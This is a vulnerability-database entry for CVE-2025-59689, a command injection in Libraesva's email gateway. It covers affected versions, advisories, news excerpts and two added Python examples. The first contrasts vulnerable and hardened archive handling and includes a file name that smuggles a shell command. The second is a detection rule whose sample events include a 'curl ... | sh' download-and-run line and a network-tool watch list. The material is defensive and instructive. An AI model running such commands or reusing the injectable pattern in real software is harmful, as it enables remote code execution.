CVE-2025-59689
Published 2025-09-19
Priority: P1 (81) · medium · 6.1 (CVSS 3.1)
Vector: AV:N / AC:L / PR:N / UI:R / S:C / C:L / I:L / A:N
CISA Known Exploited Vulnerability (remediation due 2025-10-20) · Exploited in the wild
EPSS: 1.93% (77.4th percentile)
Libraesva ESG 4.5 through 5.5.x before 5.5.7 allows command injection via a compressed e-mail attachment. For ESG 5.0 a fix has been released in 5.0.31. For ESG 5.1 a fix has been released in 5.1.20. For ESG 5.2 a fix has been released in 5.2.31. For ESG 5.4 a fix has been released in 5.4.8. For ESG 5.5 a fix has been released in 5.5.7.
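The bug class behind this CVE (CWE-77, command injection while processing members of a compressed attachment), shown as an added illustration. This is not Libraesva's code and does not reproduce the actual ESG defect: a stand-in "active-code remover" shells out once per archive member. The vulnerable variant interpolates the untrusted member name into a shell command string; the hardened variant never lets that name reach a command line, bounds archive expansion, and invokes the tool as an argv list. `wc -c` stands in for the sanitizer binary, the archive (including its hostile member name) is constructed here, and a POSIX `/bin/sh` is assumed.

```python
import io
import os
import subprocess
import tempfile
import zipfile

# Constructed sample archive (not a real exploit): one member name carries a benign
# shell payload. On a POSIX filesystem this is a perfectly legal file name.
INJECTED_NAME = 'report.html"; echo INJECTED; echo "'

# `wc -c` stands in for the external sanitizer binary; only the calling pattern matters.
SANITIZER = ["wc", "-c"]


def build_sample_archive() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(INJECTED_NAME, "<html><script>alert(1)</script></html>")
        zf.writestr("invoice.pdf", "%PDF-1.4 placeholder")
    return buf.getvalue()


def sanitize_vulnerable(archive: bytes, workdir: str) -> str:
    """CWE-77 pattern: the attacker-controlled member name is interpolated into a
    shell command string. Double quotes are not escaping; a quote inside the name
    closes the argument and the remainder runs as further shell commands."""
    out = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        for name in zf.namelist():
            dest = os.path.join(workdir, name)  # also zip-slip prone: "../" is not checked
            with open(dest, "wb") as fh:
                fh.write(zf.read(name))
            cmd = " ".join(SANITIZER) + f' "{dest}"'
            r = subprocess.run(cmd, shell=True, capture_output=True, text=True)
            out.append(r.stdout)
    return "".join(out)


def sanitize_hardened(archive: bytes, workdir: str,
                      max_members: int = 100, max_bytes: int = 50_000_000) -> str:
    """Untrusted names never reach a command line: each member is written under a
    generated name (which also kills zip-slip), declared sizes are budgeted before
    extraction, and the tool runs as an argv list with no shell in between."""
    out = []
    with zipfile.ZipFile(io.BytesIO(archive)) as zf:
        infos = zf.infolist()
        if len(infos) > max_members:
            raise ValueError("too many archive members")
        if sum(i.file_size for i in infos) > max_bytes:
            raise ValueError("archive expands past the size budget")
        for idx, info in enumerate(infos):
            if info.is_dir():
                continue
            dest = os.path.join(workdir, f"member-{idx:04d}")  # original name kept only as metadata
            with open(dest, "wb") as fh:
                fh.write(zf.read(info))
            r = subprocess.run([*SANITIZER, dest], capture_output=True, text=True, check=True)
            out.append(r.stdout)
    return "".join(out)


def demo() -> dict:
    """Run both variants on the same constructed archive and return their stdout."""
    archive = build_sample_archive()
    with tempfile.TemporaryDirectory() as d_vuln, tempfile.TemporaryDirectory() as d_safe:
        return {
            "vulnerable": sanitize_vulnerable(archive, d_vuln),
            "hardened": sanitize_hardened(archive, d_safe),
        }


if __name__ == "__main__":
    for variant, output in demo().items():
        print(f"--- {variant} ---\n{output}")
```

In the vulnerable run the injected `echo INJECTED` executes (the stand-in sanitizer itself fails, because the quoted path no longer matches the real file name); in the hardened run the only lines of output are the byte counts of `member-0000` and `member-0001`, and the hostile name is never seen by the shell because no shell is involved.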
Affected (10 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| libraesva | email_security_gateway | >= 4.5 < 5.0.31 | 5.0.31 |
| libraesva | email_security_gateway | >= 5.1 < 5.1.20 | 5.1.20 |
| libraesva | email_security_gateway | >= 5.1.0 < 5.1.20 | 5.1.20 |
| libraesva | email_security_gateway | >= 5.2 < 5.2.31 | 5.2.31 |
| libraesva | email_security_gateway | >= 5.2.0 < 5.2.31 | 5.2.31 |
| libraesva | email_security_gateway | >= 5.3 < 5.4.8 | 5.4.8 |
| libraesva | email_security_gateway | >= 5.3.0 < 5.3.16 | 5.3.16 |
| libraesva | email_security_gateway | >= 5.4.0 < 5.4.8 | 5.4.8 |
| libraesva | email_security_gateway | >= 5.5 < 5.5.7 | 5.5.7 |
| libraesva | email_security_gateway | >= 5.5.0 < 5.5.7 | 5.5.7 |
Detection & IOCs (extracted from sources)
- Trigger vector is a maliciously crafted compressed e-mail attachment: monitor inbound mail carrying compressed archive attachments (ZIP, TAR and similar) as it is processed by Libraesva ESG, especially where processing results in unexpected process spawning from the ESG mail-processing service.
- Root cause is improper sanitization during active-code removal from files inside compressed archives: look for anomalous child processes (shells in particular) spawned by Libraesva ESG mail-processing components.
- Injected commands execute as a non-privileged user: on ESG appliances, alert on unexpected shell commands or process trees under the non-root service accounts associated with e-mail processing, not only under root.
- The vendor's patch includes an automated IOC scan: use the self-assessment module shipped with the emergency update to check whether the appliance has already been compromised.
- The emergency patch was deployed automatically to both cloud and on-premise deployments: confirm that it actually applied (the vendor's self-assessment module reports this), since automatic deployment does not guarantee successful application.
- CISA KEV remediation deadline is 2025-10-20; the vendor advisory and full details are at the official Libraesva knowledge base URL linked below.
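A process-spawn rule for the detection guidance above, as an added example; it is not a Libraesva or vendor detection and the page itself indexes no detection rules. It runs over constructed execve-style events. The parent process name `mailscan-worker`, the `mailscan` service account and the event field names are assumptions standing in for the appliance's real mail-processing component, which the page does not name; replace them with the real ones before use.

```python
import re
import shlex

# Constructed execve-style events; not real appliance telemetry. The parent process
# "mailscan-worker" and the "mailscan" service account are assumptions.
SAMPLE_EVENTS = [
    {"ts": "2025-09-20T08:01:02Z", "pid": 4131, "ppid": 4120, "parent": "mailscan-worker",
     "user": "mailscan", "uid": 1001, "exe": "/usr/bin/unzip",
     "argv": ["unzip", "-o", "/var/spool/mq/att-01.zip", "-d", "/var/spool/mq/att-01"]},
    {"ts": "2025-09-20T08:01:03Z", "pid": 4132, "ppid": 4120, "parent": "mailscan-worker",
     "user": "mailscan", "uid": 1001, "exe": "/bin/sh",
     "argv": ["sh", "-c", 'wc -c "/var/spool/mq/att-01/report.html"; curl http://198.51.100.7/s | sh']},
    {"ts": "2025-09-20T08:01:03Z", "pid": 4133, "ppid": 4120, "parent": "mailscan-worker",
     "user": "mailscan", "uid": 1001, "exe": "/usr/bin/file",
     "argv": ["file", "--mime-type", "/var/spool/mq/att-01/invoice.pdf"]},
    {"ts": "2025-09-20T08:05:00Z", "pid": 4140, "ppid": 4120, "parent": "mailscan-worker",
     "user": "mailscan", "uid": 1001, "exe": "/bin/sh",
     "argv": ["sh", "-c", "wc -c /var/spool/mq/att-02/member-0001"]},
    {"ts": "2025-09-20T08:10:00Z", "pid": 900, "ppid": 1, "parent": "systemd",
     "user": "root", "uid": 0, "exe": "/bin/sh",
     "argv": ["sh", "-c", "/usr/sbin/logrotate /etc/logrotate.conf"]},
]

MAIL_PROCESSING_PARENTS = {"mailscan-worker"}   # assumption: use the appliance's real component names
INTERPRETERS = {"/bin/sh", "/bin/bash", "/bin/dash", "/usr/bin/sh", "/usr/bin/bash",
                "/usr/bin/perl", "/usr/bin/python3"}
METACHARS = re.compile(r"[;&|`]|\$\(")            # command separators / substitution
NET_TOOLS = re.compile(r"\b(curl|wget|nc|ncat|socat)\b")


def analyze(events, parents=MAIL_PROCESSING_PARENTS):
    """Return one finding per child of the mail-processing component that looks like an
    injected command. The service account is reported, not filtered on: the advisory
    says injected commands run as a non-privileged user, so root-only rules miss them.
    Severity is 'high' when more than one indicator fires on the same event."""
    findings = []
    for ev in events:
        if ev["parent"] not in parents:
            continue
        line = shlex.join(ev["argv"])
        reasons = []
        if ev["exe"] in INTERPRETERS:
            reasons.append("shell or interpreter spawned by mail-processing component")
        if METACHARS.search(line):
            reasons.append("shell metacharacters in command line")
        if NET_TOOLS.search(line):
            reasons.append("network client invoked during attachment processing")
        if not reasons:
            continue  # unzip, file(1) and similar helpers are expected children
        findings.append({
            "ts": ev["ts"], "pid": ev["pid"], "user": ev["user"],
            "severity": "high" if len(reasons) > 1 else "medium",
            "cmdline": line, "reasons": reasons,
        })
    return findings


if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f['ts']} {f['severity'].upper():6} pid={f['pid']} user={f['user']} {f['cmdline']}")
        for reason in f["reasons"]:
            print("    -", reason)
```

On the sample, pid 4132 (shell child, separators, `curl ... | sh`) is reported as high and pid 4140 (a bare `sh -c` child of the worker) as medium; the root `logrotate` shell is ignored because its parent is not a mail-processing component. The medium tier is deliberately noisy so that a baseline of the appliance's legitimate shell children can be built before the rule is tightened.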
CVSS provenance
- nvd: v3.1 6.1 MEDIUM, CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
- vulncheck: 6.1 MEDIUM
- cisa: 6.1 MEDIUM
CISA
Libraesva Email Security Gateway Command Injection Vulnerability
cisa · 2025-09-29 · CVSS 6.1 · MEDIUM · CWE-77
Affected: Libraesva Email Security Gateway
Libraesva Email Security Gateway (ESG) contains a command injection vulnerability which allows command injection via a compressed e-mail attachment.
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Notes: https://docs.libraesva.com/knowledgebase/security-advisory-command-injection-vulnerability-cve-2025-59689/ ; https://nvd.nist.gov/vuln/detail/CVE-2025-59689
Remediation Due Date: 2025-10-20
GHSA
GHSA-363h-22w6-hcrm: Libraesva ESG 4
ghsa_unreviewed · 2025-09-19 · MEDIUM · CWE-77
Libraesva ESG 4.5 through 5.5.x before 5.5.7 allows command injection via a compressed e-mail attachment. For ESG 5.0 a fix has been released in 5.0.31. For ESG 5.1 a fix has been released in 5.1.20. For ESG 5.2 a fix has been released in 5.2.31. For ESG 5.4 a fix has been released in 5.4.8. For ESG 5.5 a fix has been released in 5.5.7.
VulnCheck
Libraesva Email Security Gateway Command Injection Vulnerability
vulncheck · 2025 · CVSS 6.1 · MEDIUM · CWE-77
Libraesva Email Security Gateway (ESG) contains a command injection vulnerability which allows command injection via a compressed e-mail attachment.
Affected: Libraesva Email Security Gateway
Required Action: Apply mitigations per vendor instructions, follow applicable BOD 22-01 guidance for cloud services, or discontinue use of the product if mitigations are unavailable.
Exploitation References: https://docs.libraesva.com/knowledgebase/security-advisory-command-injection-vulnerability-cve-2025-59689/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_vulnerabilities.json; https://hs-8813571.f.hubspotemail.net/hubfs/8813571/PERISCOPE_VULNINTEL_20251007.pdf; https://www.rapid7.com/cdn/assets/bltbd2f1cd70f9e3e7
No detection rules found.
No public exploits indexed.
Bleepingcomputer · blogs_bleepingcomputer · 2025-09-23 · CVSS 6.1 · MEDIUM
## Libraesva ESG issues emergency fix for bug exploited by state hackers
Bill Toulas
Libraesva rolled out an emergency update for its Email Security Gateway (ESG) solution to fix a vulnerability exploited by threat actors believed to be state sponsored.
The email security product protects email systems from phishing, malware, spam, business email compromise, and spoofing, using a multi-layer protection architecture.
According to the vendor, Libraesva ESG is used by thousands of small and medium businesses as well as large enterprises worldwide, serving over 200,000 users.
The security issue, tracked under CVE-2025-59689, received a medium-severity score. It is triggered by sending a maliciously crafted email attachment and allows executing arbitrary shell commands from a non-priv
Recorded Future · blogs_recorded_future · CVSS 7.2 · HIGH
# September 2025 CVE Landscape
In September 2025, Recorded Future’s Insikt Group® identified sixteen high-impact vulnerabilities that should be prioritized for remediation. This represents a decrease from the eighteen identified in August, with the number of Very Critical vulnerabilities also decreasing (11) month over month.
These vulnerabilities have affected the following vendors: Sudo, Libraesva, Fortra, Cisco, Adminer, Google, Dassault Systèmes, Linux, Android, Sitecore, TP-Link, and Meta Platforms.
September was dominated by flaws in Cisco and TP-Link, which together represented six of the sixteen vulnerabilities. Cisco’s IOS, IOS XE, and Secure Firewall products were affected by flaws, including stack-based and classic buffer overflows (CWE-121, CWE-120) and missing authorization
Timeline
- 2025-09-19: Published
- 2025-09-29: Added to CISA KEV
- Exploited in the wild